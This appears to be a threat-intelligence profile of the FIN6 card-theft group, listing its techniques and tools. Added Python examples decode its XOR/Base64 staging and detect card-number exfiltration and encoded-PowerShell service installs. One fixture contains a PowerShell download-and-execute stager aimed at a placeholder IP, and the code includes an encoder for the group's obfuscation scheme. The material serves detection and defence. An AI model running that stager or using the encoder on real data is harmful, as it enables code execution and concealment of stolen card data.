FIN6

FIN6 is a cybercrime group that has stolen payment card data and sold it for profit on underground marketplaces. The group has aggressively targeted and compromised point-of-sale (PoS) systems in the hospitality and retail sectors.[1][2]

ID: G0037
Associated Groups: Magecart Group 6, ITG08, Skeleton Spider, TAAL, Camouflage Tempest
Contributors: Center for Threat-Informed Defense (CTID); Drew Church, Splunk
Version: 4.0
Created: 31 May 2017
Last Modified: 17 November 2024

Associated Group Descriptions

Name Description
Magecart Group 6 [3]
ITG08 [4]
Skeleton Spider [5]
TAAL [6]
Camouflage Tempest [6]

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

FIN6 has used WMI to automate the remote execution of PowerShell scripts.[4]

Enterprise T1213 Data from Information Repositories

FIN6 has collected schemas and user accounts from systems running SQL Server.[7]

Enterprise T1555 Credentials from Password Stores

FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.[7]

.003 Credentials from Web Browsers

FIN6 has used the Stealer One credential stealer to target web browsers.[7]

Enterprise T1005 Data from Local System

FIN6 has collected and exfiltrated payment card data from compromised systems.[8][9][10]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

FIN6 has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.[2]

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]

Enterprise T1572 Protocol Tunneling

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[1]

Enterprise T1059 Command and Scripting Interpreter

FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1][2]

.001 PowerShell

FIN6 has used PowerShell to gain access to merchants' networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[1][2][7]

.003 Windows Command Shell

FIN6 has used a kill.bat script to disable security tools.[2]

.007 JavaScript

FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.[8]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

FIN6 has deployed a utility script named kill.bat to disable anti-virus.[2]

Enterprise T1560 Archive Collected Data

Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.[1]

.003 Archive via Custom Method

FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.[1][8]
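The entry above names two layers: a single-byte XOR with key 0xAA and Base64 over a permuted alphabet. The block below is an added example, not code from this page or from FIN6's tooling, that implements both layers in each direction and then shows why the XOR layer gives no secrecy: all 256 candidate keys can be tried and the right one picked out by looking for a Track 2 record in the output. The permuted alphabet (a fixed rotation of the standard one), the Track 2 test record, and the 0xAA default are assumptions for illustration; the actual substitution table is not reproduced on this page.

```python
import base64
import re
import string

# Standard Base64 alphabet and a stand-in permuted alphabet. The permutation is
# an assumption for illustration (a rotation by 17 positions); the table used by
# FIN6's tooling is not given on the page and is not reproduced here.
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
PERM_ALPHABET = STD_ALPHABET[17:] + STD_ALPHABET[:17]
XOR_KEY = 0xAA  # the single-byte key named on the page

# Track 2 layout: ';' PAN '=' YYMM service-code discretionary-data '?'
TRACK2_RE = re.compile(rb";\d{13,19}=\d{4}\d*\?")


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def encode_staged(plaintext: bytes, key: int = XOR_KEY) -> str:
    """Attacker-side transform: XOR, then Base64 emitted in the permuted alphabet."""
    std = base64.b64encode(xor_single_byte(plaintext, key)).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, PERM_ALPHABET))


def decode_staged(blob: str, key: int = XOR_KEY) -> bytes:
    """Analyst-side inverse: map the alphabet back, Base64-decode, then XOR."""
    std = blob.translate(str.maketrans(PERM_ALPHABET, STD_ALPHABET))
    return xor_single_byte(base64.b64decode(std), key)


def recover_xor_keys(xored: bytes) -> list:
    """Brute-force all 256 single-byte keys and keep those whose output contains a
    Track 2 record. Useful when a sample uses a key other than 0xAA."""
    return [k for k in range(256) if TRACK2_RE.search(xor_single_byte(xored, k))]


if __name__ == "__main__":
    # Constructed test record using a well-known Luhn-valid test PAN, not real card data.
    sample = b";4111111111111111=25121011000012345678?"
    blob = encode_staged(sample)
    print("staged  :", blob)
    print("decoded :", decode_staged(blob))
    xored = base64.b64decode(blob.translate(str.maketrans(PERM_ALPHABET, STD_ALPHABET)))
    print("keys    :", [hex(k) for k in recover_xor_keys(xored)])
```

The same key-recovery loop works for any staged file whose plaintext has a recognisable structure; the regex is the only part that changes. If a capture does not decode under the standard alphabet, compare the character frequencies of the blob against ordinary Base64 before assuming a different XOR key, since an alphabet permutation is the more likely cause.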

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

FIN6 has used Windows Credential Editor for credential dumping.[1][2]

.003 OS Credential Dumping: NTDS

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1][2]

Enterprise T1074 .002 Data Staged: Remote Data Staging

FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.[1]

Enterprise T1110 .002 Brute Force: Password Cracking

FIN6 has extracted password hashes from ntds.dit to crack offline.[1]

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.[8]
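Card data leaving over plain HTTP POSTs, as described in this entry and in the Data from Local System entry above, is detectable at the proxy without any attacker-specific indicator: the body is decoded, 13- to 19-digit runs are checked against the Luhn formula, and hits going anywhere other than the merchant's own payment endpoints are raised. The block below is an added example, not code from this page or from any FIN6 sample. The proxy log format, the host names, and the log lines are constructed for the example; the 4111111111111111 value is a standard test PAN, not real card data.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed proxy log lines (not from any real capture). Assumed line format:
# "<timestamp> <method> <url> body=<form-encoded body>".
SAMPLE_PROXY_LOG = """\
2024-03-01T12:00:01Z POST https://shop.example/checkout/submit body=card=4111111111111111&exp=1225&cvv=123
2024-03-01T12:00:02Z POST https://cdn-stats.example/collect body=d=%3B4111111111111111%3D25121011000012345678%3F
2024-03-01T12:00:03Z POST https://shop.example/api/search body=q=1234567890123456
2024-03-01T12:00:04Z GET https://shop.example/product/42 body=
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<url>\S+) body=(?P<body>.*)$")
# 13-19 digit runs that are not part of a longer digit run
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn check: from the right, double every second digit, subtract 9 above 9."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep first six and last four digits so alerts do not themselves leak PANs."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_pans(text: str) -> list:
    """Digit runs of card length that also pass Luhn; order ids and timestamps drop out."""
    return [m for m in PAN_RE.findall(text) if luhn_valid(m)]


def scan_proxy_log(log_text: str, allowed_hosts) -> list:
    """Alert on POST bodies carrying Luhn-valid PANs to hosts outside the allowlist.
    The allowlist holds the merchant's own payment endpoints, where card data is expected."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        body = unquote_plus(m["body"])  # undo form/percent encoding before matching
        pans = find_pans(body)
        if not pans:
            continue
        host = urlsplit(m["url"]).hostname
        if host in allowed_hosts:
            continue
        alerts.append({"ts": m["ts"], "host": host, "pans": [mask_pan(p) for p in pans]})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG, {"shop.example"}):
        print(alert)
```

The second log line is the interesting one: a Track 2 record sent to a third-party host, percent-encoded in a form field. The 20-digit discretionary data after the `=` does not match because it is longer than a PAN, and the 16-digit search term on the third line fails Luhn, which is what keeps this rule quiet on ordinary traffic. Bodies that are Base64- or XOR-wrapped need the wrapper removed first, as in the Archive via Custom Method example above.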

Enterprise T1078 Valid Accounts

To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.[1][2][7]

Enterprise T1068 Exploitation for Privilege Escalation

FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.[1]

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

FIN6 has used encoded PowerShell commands.[7]

Enterprise T1204 .002 User Execution: Malicious File

FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.[7]

Enterprise T1070 .004 Indicator Removal: File Deletion

FIN6 has removed files from victim machines.[1]

Enterprise T1569 .002 System Services: Service Execution

FIN6 has created Windows services to execute encoded PowerShell commands.[2]
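Both this entry and the Masquerade Task or Service entry above describe artefacts that land in the same place: the System log's Event ID 7045 ("A service was installed in the system"), whose ServiceName and ImagePath fields are enough to catch a renamed PsExec service and a service whose image is PowerShell carrying an -EncodedCommand payload. The block below is an added example, not code from this page or from any FIN6 or Metasploit component; it decodes the Base64(UTF-16LE) form that powershell.exe expects and applies both checks to constructed records. The record shape, the service names, the stager text and the 203.0.113.5 address are constructed for the example.

```python
import base64
import binascii

# Constructed stager text used as the hidden command in the sample records below.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"


def encode_powershell(command: str) -> str:
    """Base64 over UTF-16LE, which is what powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Inverse of encode_powershell; None when the token is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_encoded_command(image_path: str):
    """Return (switch, decoded_command) for the first -e/-ec/-enc/-EncodedCommand
    switch in a command line, or None. PowerShell accepts any unambiguous prefix
    of -EncodedCommand, so the check is prefix-based rather than a fixed list."""
    tokens = image_path.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1:
            name = tok[1:].lower()
            if name == "ec" or "encodedcommand".startswith(name):
                return tok, decode_encoded_command(tokens[i + 1])
    return None


# Constructed records shaped like the fields of Event ID 7045; not from any real incident.
SAMPLE_7045 = [
    {"ServiceName": "mstdc", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
    {"ServiceName": "aZ3kQw",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -enc "
                  + encode_powershell(STAGER)},
]


def analyze_service_installs(records) -> list:
    """Apply two checks to 7045-style records and return the findings."""
    findings = []
    for rec in records:
        name, path = rec["ServiceName"], rec["ImagePath"]
        low = path.lower()
        # PsExec's service binary registered under a name other than its default
        if "psexesvc" in low and name.upper() != "PSEXESVC":
            findings.append({"service": name, "rule": "renamed_psexec_service",
                             "detail": path, "decoded": None})
        # A service whose image is a PowerShell host rather than a service binary
        if "powershell" in low or "pwsh" in low:
            hit = extract_encoded_command(path)
            if hit is not None:
                findings.append({"service": name, "rule": "encoded_powershell_service",
                                 "detail": hit[0], "decoded": hit[1]})
            else:
                findings.append({"service": name, "rule": "powershell_service",
                                 "detail": path, "decoded": None})
    return findings


if __name__ == "__main__":
    for f in analyze_service_installs(SAMPLE_7045):
        print(f["service"], f["rule"], f["decoded"] or f["detail"])
```

The default PSEXESVC name is left unflagged here only to keep the renamed case distinct; in most environments any PsExec service installation is worth an alert of its own. Decoding the payload matters because the decoded text, not the Base64 blob, is what carries the host or URL you will pivot on next.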

Enterprise T1102 Web Service

FIN6 has used Pastebin and Google Storage to host content for their operations.[2]

Enterprise T1046 Network Service Discovery

FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]

Enterprise T1119 Automated Collection

FIN6 has used a script to iterate through a list of compromised PoS systems, copy data to a log file and remove the original files, and to bind to events from the submit payment button.[1][8]

Enterprise T1588 .002 Obtain Capabilities: Tool

FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.[4][2]

Enterprise T1134 Access Token Manipulation

FIN6 has used Metasploit's named-pipe impersonation technique to escalate privileges.[2]

Enterprise T1087 .002 Account Discovery: Domain Account

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

FIN6 used RDP to move laterally in victim networks.[1][2]

Enterprise T1018 Remote System Discovery

FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

FIN6 has targeted victims with e-mails containing malicious attachments.[7]

.003 Phishing: Spearphishing via Service

FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.[4]

Enterprise T1095 Non-Application Layer Protocol

FIN6 has used Metasploit Bind and Reverse TCP stagers.[8]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.[1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

FIN6 has used Comodo code-signing certificates.[4]

Software

ID Name References Techniques
S0552 AdFind [2] Domain Trust Discovery, Permission Groups Discovery: Domain Groups, System Network Configuration Discovery, Account Discovery: Domain Account, Remote System Discovery
S0154 Cobalt Strike [2] BITS Jobs, Windows Management Instrumentation, Data from Local System, Proxy: Domain Fronting, Proxy: Internal Proxy, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Create or Modify System Process: Windows Service, Office Application Startup: Office Template Macros, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Protocol Tunneling, Reflective Code Loading, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify Tools, Exploitation for Client Execution, Screen Capture, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Data Transfer Size Limits, Data Obfuscation: Protocol or Service Impersonation, Data Encoding: Standard Encoding, File and Directory Discovery, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Native API, Exploitation for Privilege Escalation, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Query Registry, Browser Session Hijacking, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Indicator Removal: Timestomp, System Binary Proxy Execution: Rundll32, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, System Network Configuration Discovery, Network Share Discovery, Network Service Discovery, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Hide Artifacts: Process Argument Spoofing, Non-Application Layer Protocol, Scheduled Transfer, Subvert Trust Controls: Code Signing
S0381 FlawedAmmyy [7] Windows Management Instrumentation, Data from Local System, Clipboard Data, Encrypted Channel: Symmetric Cryptography, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Peripheral Device Discovery, Screen Capture, Application Layer Protocol: Web Protocols, Data Obfuscation, Permission Groups Discovery: Local Groups, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Binary Proxy Execution: Msiexec, System Information Discovery, System Owner/User Discovery, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture, Exfiltration Over C2 Channel
S0503 FrameworkPOS [11][5][7] Data from Local System, Archive Collected Data: Archive via Custom Method, Data Staged: Local Data Staging, Exfiltration Over Alternative Protocol, Process Discovery
S0632 GrimAgent [12] Data from Local System, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Execution Guardrails: Mutual Exclusion, Data Obfuscation: Junk Data, Data Encoding: Standard Encoding, File and Directory Discovery, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Binary Padding, Indicator Removal: Clear Persistence, Indicator Removal: File Deletion, System Location Discovery: System Language Discovery, System Location Discovery, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery, Virtualization/Sandbox Evasion: Time Based Evasion, Ingress Tool Transfer, Exfiltration Over C2 Channel, Scheduled Task/Job: Scheduled Task
S0372 LockerGoga [2] Loss of Control, Loss of Productivity and Revenue, Loss of View, Impair Defenses: Disable or Modify Tools, Data Encrypted for Impact, Lateral Tool Transfer, Indicator Removal: File Deletion, System Shutdown/Reboot, Account Access Removal, Subvert Trust Controls: Code Signing
S0449 Maze [13] Windows Management Instrumentation, Masquerading: Masquerade Task or Service, Dynamic Resolution, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify Tools, Application Layer Protocol: Web Protocols, Data Encrypted for Impact, Service Stop, Native API, Obfuscated Files or Information: Binary Padding, Obfuscated Files or Information, Indicator Removal, System Binary Proxy Execution: Msiexec, System Location Discovery: System Language Discovery, System Information Discovery, System Shutdown/Reboot, Inhibit System Recovery, System Network Connections Discovery, Process Discovery, Process Injection: Dynamic-link Library Injection, Hide Artifacts: Run Virtual Instance, Scheduled Task/Job: Scheduled Task
S0002 Mimikatz [4] Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, Rogue Domain Controller, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket, Boot or Logon Autostart Execution: Security Support Provider, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Unsecured Credentials: Private Keys, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Authentication Certificates, Access Token Manipulation: SID-History Injection, Account Manipulation
S0284 More_eggs [4][7] Encrypted Channel: Symmetric Cryptography, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Data Encoding: Standard Encoding, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery: Internet Connection Discovery, System Network Configuration Discovery, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Subvert Trust Controls: Code Signing
S0029 PsExec [1][2] Create or Modify System Process: Windows Service, Create Account: Domain Account, Lateral Tool Transfer, System Services: Service Execution, Remote Services: SMB/Windows Admin Shares
S0446 Ryuk [2] Loss of Productivity and Revenue, Masquerading: Match Legitimate Name or Location, Masquerading, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify Tools, Data Encrypted for Impact, File and Directory Discovery, File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Valid Accounts: Domain Accounts, Service Stop, Native API, Traffic Signaling, Obfuscated Files or Information, System Location Discovery: System Language Discovery, System Information Discovery, Inhibit System Recovery, System Network Configuration Discovery, Access Token Manipulation, Process Discovery, Process Injection, Remote Services: SMB/Windows Admin Shares, Scheduled Task/Job: Scheduled Task
S0005 Windows Credential Editor [1] OS Credential Dumping: LSASS Memory

References